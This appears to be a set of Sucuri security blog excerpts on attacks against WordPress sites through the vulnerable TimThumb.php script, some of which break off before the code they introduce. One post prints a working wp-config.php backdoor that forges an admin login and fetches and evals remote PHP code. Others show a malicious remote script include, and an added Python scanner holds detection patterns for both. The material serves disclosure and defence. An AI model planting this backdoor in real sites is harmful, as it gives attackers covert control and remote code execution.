TimThumb.php Attacks – Now Being Used for Blackhat Spam SEO and Might Break Your Site

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating that script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is sites getting compromised to load links for blackhat SEO purposes. They have their wp-settings.php modified with the following code:


TimThumb.php attacks – Now using googlesafebrowsing dot com

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating the script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is a small modification to the attack method. Instead of modifying the .htaccess or infecting the jquery.js or l10n.js scripts within WordPress core, they are modifying the header.php of the compromised WordPress site with this code:


Mass Infection of WordPress Sites Due to TimThumb ( counter-wordpress dot com )

Many people are asking us about this “counter-wordpress.com” type of malware, so we will post some details here. Our scanner has been identifying it for a while, so if you think your site is compromised, just check it there.

So first, to make things clear, this is happening on sites that include the vulnerable timthumb.php script on them. You have to make sure that none of your themes or plugins are vulnerable. You can get more information here on how to verify it: TimThumb PHP Vulnerability – Just the Tip of the Iceberg. This is not a vulnerability on WordPress.

Understanding the problem

Since the vulnerability on TimThumb was released (0-day), we started to see many scans in our logs looking for that script. Once it is found, the attackers will do many things:

Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned

We are seeing large scale attacks against the vulnerable timthumb.php script in the wild. Thousands of sites are getting compromised and if you have it in your WordPress site, you better get it fixed right now!

After a few days analyzing the compromised sites and many log files, here are the plugins we’ve seen getting scanned by the attackers (total of 25):

WordPress sites with .htaccess hacked

The TimThumb.php vulnerability is causing a lot of WordPress sites to get compromised with the superpuperdomain.com and superpuperdomain2.com remote JavaScript injection.

However, that’s not all that it is doing. On many of the sites we are analyzing, the .htaccess file is also getting modified to redirect search engine and organic traffic to some Russian domains. Here is what we’re seeing in the compromised .htaccess files:

TimThumb.php Vulnerability Not Only Affecting Themes – Plugins too

The Timthumb.php vulnerability is being used in the wild to hack and infect thousands of WordPress sites.

Hopefully everyone is checking their themes and updating the script to make sure it is not vulnerable. This is wishful thinking.

Unfortunately, the issue is not limited to themes alone. There are some plugins that include the TimThumb.php script, and you need to check and update them as well (if you are not sure how to do so, check out this post; we’ve included a script to automate it for you).

Non-Stop Attacks Against osCommerce – Time to Take Action

The malware attacks against osCommerce sites are still going at full force and the site owners have to take action to secure and update their sites as soon as possible. Think about it: with so many valuable targets (online stores) that are not updated and secured, why would they stop attacking now?

If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it to check if it’s clean: Sucuri SiteCheck.


Update to the Superpuperdomain2.com malware

Just a quick update to the Superpuperdomain2.com/Superpuperdomain.com malware infection that has been affecting thousands of WordPress sites with the vulnerable timthumb.php script.

You can read more about it here: http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain2-com.html

But now the attackers are also adding the following code to the wp-config.php of the hacked sites:

if (isset($_GET['pingnow']) && isset($_GET['pass'])){
    if ($_GET['pass'] == '66f041e16a60928b05a7e228a89c3799'){
        // 'login': silently authenticates the requester as the admin user
        if ($_GET['pingnow'] == 'login'){
            $user_login = 'admin';
            $user = get_userdatabylogin($user_login);
            $user_id = $user->ID;
            wp_set_current_user($user_id, $user_login);
            wp_set_auth_cookie($user_id);
            do_action('wp_login', $user_login);
        }
        // 'exec': downloads a remote file into a randomly named .php and redirects to it
        if (($_GET['pingnow'] == 'exec') && (isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        // 'eval': fetches remote PHP code and runs it in place
        if (($_GET['pingnow'] == 'eval') && (isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}

It acts as a backdoor, so they can control the site and add more injections/malware whenever they want. If you are running WordPress, check if your theme (or plugin) has this timthumb.php script. If it does, update or remove it now! You can also scan it here to see if it is infected: http://sitecheck.sucuri.net.
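As an added example (not code from the post), here is a small Python scanner that looks for the shape of this wp-config.php backdoor and for the superpuperdomain count.php include across the .php files of a WordPress install; the files it scans are constructed samples and the password hash in them is a placeholder.

```python
import os
import re
import tempfile

# Constructed samples (not from a real site): backdoor shape, remote include, clean file.
BACKDOOR_SAMPLE = """<?php
if (isset($_GET['pingnow']) && $_GET['pass'] == 'CONSTRUCTED_MD5_PLACEHOLDER'){
  if ($_GET['pingnow'] == 'login'){ wp_set_auth_cookie(get_userdatabylogin('admin')->ID); }
}
"""
INJECT_SAMPLE = ('<?php get_header(); ?>\n<script language="javascript" '
                 'SRC="http://superpuperdomain2.com/count.php?ref="></script>\n')
CLEAN_SAMPLE = "<?php\n/* Ordinary theme file with nothing suspicious. */\necho 'ok';\n"

# $_GET['pingnow'] read shortly before an auth-cookie call, a curl download or an eval()
PINGNOW_RE = re.compile(
    r"\$_GET\[\s*['\"]pingnow['\"]\s*\].{0,400}?(?:wp_set_auth_cookie|curl_init|\beval\s*\()", re.S)
# Remote include of count.php from either superpuperdomain domain.
INJECT_RE = re.compile(
    r"<script[^>]*src=[\"']?https?://superpuperdomain2?\.com/count\.php", re.I)

def scan_source(src):
    """Return the indicator names matched in one file's contents."""
    found = []
    if PINGNOW_RE.search(src):
        found.append("pingnow-backdoor")
    if INJECT_RE.search(src):
        found.append("superpuperdomain-inject")
    return found

def scan_tree(root):
    """Walk a WordPress install; map relative .php paths to their hits."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
                if found:
                    hits[os.path.relpath(path, root)] = found
    return hits

def demo():
    # Write the constructed samples into a temp dir and scan it.
    root = tempfile.mkdtemp()
    for name, body in (("wp-config.php", BACKDOOR_SAMPLE),
                       ("header.php", INJECT_SAMPLE), ("index.php", CLEAN_SAMPLE)):
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return scan_tree(root)
```

Point scan_tree at a real document root to get a list of files that need a manual look; a hit is a starting point for cleanup, and the vulnerable timthumb.php still has to be updated or removed regardless.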

Thanks,

WordPress Sites Hacked with Superpuperdomain2.com

A few days ago we posted about a series of attacks that were happening against WordPress sites running the vulnerable timthumb.php script.

We detected thousands of sites compromised with it and now we are seeing a small change in the malware. Instead of superpuperdomain.com, the malware is now pointing to a remote JavaScript from superpuperdomain2.com (note the extra 2). This is what shows up in the compromised sites:

<script language="javascript" SRC="http://superpuperdomain2.com/count.php?ref="

That code is generated by an echo statement hidden within one of the WordPress core files and is always accompanied by multiple backdoors and even .htaccess redirections (to http://generation-internet.ru and other Russian sites).

Both domains were registered by Archil Karsaulidze (probably fake) and are pointing to 91.196.216.20:

Archil Karsaulidze admin@superpuperdomain.com
+74957261532 fax: +74957261532
Novopeschanaya, 3-28
Moscow Moscowscaya Oblast 107263
ru

How are the sites getting compromised?

On the sites we’ve analyzed, they were hacked through the timthumb.php vulnerability that was published a few days ago. The attackers are also creating a bunch of backdoors to maintain their access to the hacked sites.

If you are using the timthumb.php script, remove or update it now!

Keeping yourself secure

This is not a vulnerability in WordPress, it is a vulnerability found in various WordPress themes that include TimThumb! You have to make sure that you are using an updated theme, and from a legitimate source. Otherwise your theme may contain this vulnerability, or others (even backdoors), that may not be given the proper attention by their theme authors.

If you’re not sure, you can do a free scan of your site using Sucuri SiteCheck.

WordPress Sites Hacked with Superpuperdomain dot com (Attacking Timthumb.php)

We are seeing a large number of WordPress sites compromised with a malicious JavaScript loading from superpuperdomain.com/count.php. That JavaScript redirects visitors that were going to the WordPress site to fake search engines.

This is what shows up at the bottom of the hacked sites:

<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref=http%3A%2F%2Fsite.com%2Fdif%2F"></script>

This script basically loads a bunch of encoded JavaScript that redirects the user to www.upliftsearch.com, www.filmannex.com and other “search engines” full of ads.

How are the sites getting compromised?

On the sites we’ve analyzed, they were hacked through the timthumb.php vulnerability that was published a few days ago. The attackers are also creating a bunch of backdoors to maintain their access to the hacked sites.

If you are using the timthumb.php script, remove or update it now!

Keeping yourself secure

This is not a vulnerability in WordPress, it is a vulnerability found in various WordPress themes that include TimThumb! You have to make sure that you are using an updated theme, and from a legitimate source. Otherwise your theme may contain this vulnerability, or others (even backdoors), that may not be given the proper attention by their theme authors.

If you’re not sure, you can do a free scan of your site using Sucuri SiteCheck.